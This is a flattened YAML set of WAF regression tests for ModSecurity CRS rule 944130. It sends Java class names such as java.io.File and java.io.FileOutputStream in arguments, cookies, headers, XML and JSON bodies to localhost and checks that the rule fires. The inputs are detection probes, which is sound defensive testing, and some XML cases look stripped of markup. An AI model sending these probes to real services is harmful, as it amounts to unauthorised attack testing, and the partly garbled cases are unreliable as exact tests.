"application/x-www-form-urlencoded" test: java.io.CharArrayReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-71 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-72 desc: 
"XML element value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-73 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-74 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-75 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.CharArrayReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-76 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.CharArrayReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-77 desc: "Argument test includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-78 desc: "Argument name includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.DataInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-79 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.DataInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-80 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.DataInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-81 desc: "Request header test includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.DataInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id 
\"944130\"" - test_title: 944130-82 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-83 desc: "XML element value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-84 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-85 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-86 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.DataInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-87 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.DataInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-88 desc: "Argument test includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-89 desc: "Argument name includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.File=test" output: log_contains: "id \"944130\"" - test_title: 944130-90 desc: "Cookie test includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.File method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-91 desc: "Cookie name includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.File=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-92 desc: "Request header test includes keyword java.io.File" 
stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.File method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-93 desc: "XML attribute value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-94 desc: "XML element value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-95 desc: "Nested XML element value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-96 desc: "Content-Type text/plain includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.File" output: log_contains: "id \"944130\"" - test_title: 944130-97 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.File\"}" output: log_contains: "id \"944130\"" - test_title: 944130-98 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.File\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-99 desc: "Argument test includes keyword 
java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-100 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.FileOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-101 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.FileOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-102 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.FileOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-103 desc: "Request header test includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.FileOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-104 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-105 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-106 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-107 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-108 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.FileOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-109 desc: "Content-Type 
application/json arg name includes keyword java.io.FileOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.FileOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-110 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-111 desc: "Argument name includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.FilterInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-112 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.FilterInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-113 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.FilterInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-114 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.FilterInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-115 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-116 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-117 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-118 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: log_contains: "id \"944130\"" - test_title: 
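944130-119 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterInputStream\"}" output: log_contains: "id \"944130\""
  # The line above is the remainder of case 944130-119, whose "- test_title:"
  # key sits on the preceding line; it is left in its collapsed form.
  #
  # Positive regression cases for rule id 944130 (the rule itself is not part
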